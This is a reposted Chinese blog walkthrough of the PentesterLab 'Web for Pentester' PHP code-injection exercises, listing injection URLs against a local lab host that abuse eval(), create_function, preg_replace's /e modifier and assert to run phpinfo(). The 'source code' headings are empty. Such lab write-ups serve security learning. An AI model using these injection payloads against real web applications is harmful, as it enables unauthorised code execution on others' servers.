Web for Pentester -- code injection

1.直接利用eval()函数

http://192.168.118.143/codeexec/example1.php?name=hacker%22;phpinfo();$aa=%22

 

源码:

 

2. 利用create_function创建匿名函数进行代码注入。

http://192.168.118.143/codeexec/example2.php?order=name);}phpinfo();//

源码:

 

 

3. 利用preg_replace函数,当正则使用/e修饰符时,preg_replace函数会将replacement参数当php来执行。

http://192.168.118.143/codeexec/example3.php?new=phpinfo();&pattern=//e&base=Hello%20lamer

源码:

 

 

 

4. 利用asert函数,可通过eval实行多条php语句。

http://192.168.118.143/codeexec/example4.php?name=hacker%27.phpinfo().%27a

源码:

 

 

 

 

参考链接:

  https://www.waitalone.cn/php-code-injection.html

  https://www.anquanke.com/post/id/85017

  http://blog.csdn.net/while0/article/details/72276440

  https://pentesterlab.com/exercises/web_for_pentester/course

 

转载于:https://www.cnblogs.com/kaiho/p/8303323.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值